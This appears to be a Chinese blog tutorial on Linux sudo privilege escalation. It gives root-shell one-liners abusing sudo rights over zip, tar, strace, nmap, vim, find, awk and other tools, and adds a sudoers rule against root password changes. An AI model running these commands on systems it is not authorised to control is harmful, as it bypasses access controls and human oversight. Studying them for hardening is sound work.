sudo提权

简介: 参考文献:http://zone.secevery.com/article/989https://www.anquanke.com/post/id/158511sudo概念:sudo (Substitute User and Do 的简写)临时授权,可以临时让其以root 权限运行某个程序。


sudo概念:

sudo (Substitute User and Do 的简写)临时授权,可以临时让其以root 权限运行某个程序。在/etc/sudoers中设置了可执行sudo指令的用户。

各种提权操作

①su

test@ubuntu:/tmp$ sudo su - root

②zip

test@ubuntu:/tmp$ sudo zip /tmp/1.zip /tmp/test -T --unzip-command="sh -c /bin/bash"#1.zip是随手添加进去的一个zip文件
#-T 表示测试1.zip的完整性
# --unzip-command 与-T 一起使用,可以指定自定义命令用于解压1.zip
#可以自定义用于解压test.zip 的的命令,自定义解压命令是以root权限执行的,指定为sh -c /bin/bash, 获取一个root权限的shell

③tar

test@ubuntu:/tmp$sudo tar cf /dev/null test --checkpoint=1 --checkpoint-action=exec=/bin/bash
#–checkpoint-action 选项是提权点,可以自定义需要执行的动作,指定为exec=/bin/bash,获取一个root权限的shell

④strace

test@ubuntu:/tmp$sudo strace -o/dev/null /bin/bash
#strace 以root权限运行跟踪调试/bin/bash, 从而获取root权限的shell

⑤nmap

test@ubuntu:/tmp$ echo "os.execute('/bin/sh')">/tmp/shell.nse
test@ubuntu:/tmp$ sudo nmap --script=/tmp/shell.nse

⑥more

test@ubuntu:/tmp$sudo more /etc/rsyslog.conf
然后加上!/bin/bash 即可获取root权限的shell

⑦git

test@ubuntu:/tmp$sudo git help status
然后加上!/bin/bash 即可获取root权限的shell

⑧ftp

test@ubuntu:/tmp$ sudo ftp
ftp> !/bin/bash

⑨vim

test@ubuntu:/tmp$ sudo vim -c '!sh

⑩find

test@ubuntu:/tmp$ sudo find /bin/ -name ls -exec /bin/bash \;
#对于find 检索到的每一个结果,都执行/bin/bash, 是以root权限执行的

⑩①passwd

test@ubuntu:/tmp$ sudo passwd
Enter new UNIX password: 
Retype new UNIX password: 

⑩②awk

test@ubuntu:/etc$ sudo awk 'BEGIN {system("/bin/bash")}'

防止有sudo权限的普通用户修改root用户的密码

/etc/sudoers添加:

test  ALL=(root)     !/usr/bin/passwd, /usr/bin/passwd [A-Za-z]*, !/usr/bin/passwd root
#用户账号,登陆来源的主机名,可切换的身份,可执行的命令
目录
相关文章
|
安全 Unix Linux
CentOS7 Sudo本地提权漏洞修复实践
CentOS7 Sudo本地提权漏洞修复实践
1005 0
CentOS7 Sudo本地提权漏洞修复实践
|
2月前
|
安全 Shell 网络安全
uvalde-bash提权
uvalde-bash提权
20 1
|
7月前
|
Linux 开发工具
linux sudo指令提权
linux sudo指令提权
|
7月前
|
安全 Linux 数据安全/隐私保护
Linux命令 su 和 sudo 的区别
【2月更文挑战第5天】
126 0
Linux命令 su 和 sudo 的区别
|
7月前
|
Linux Shell 数据安全/隐私保护
linux命令之sudo/su
linux命令之sudo/su
149 7
|
Linux 数据安全/隐私保护
Linux系统之普通用户sudo提权配置
Linux系统之普通用户sudo提权配置
333 0
|
Shell 数据安全/隐私保护
3.7 su命令 3.8 sudo命令 3.9 限制root远程登录
3.7 su命令 3.8 sudo命令 3.9 限制root远程登录   su命令 切换用户 [root@centos_1 ~]# su - xiaobo   [root@centos_1 ~]# su - xiaobo 最后一次失败的登录:二 11月 21 01:43:41 CST 2017pts/0 上 最有一次成功登录后有 1 次失败的登录尝试。
1637 0
|
Shell 数据安全/隐私保护 数据库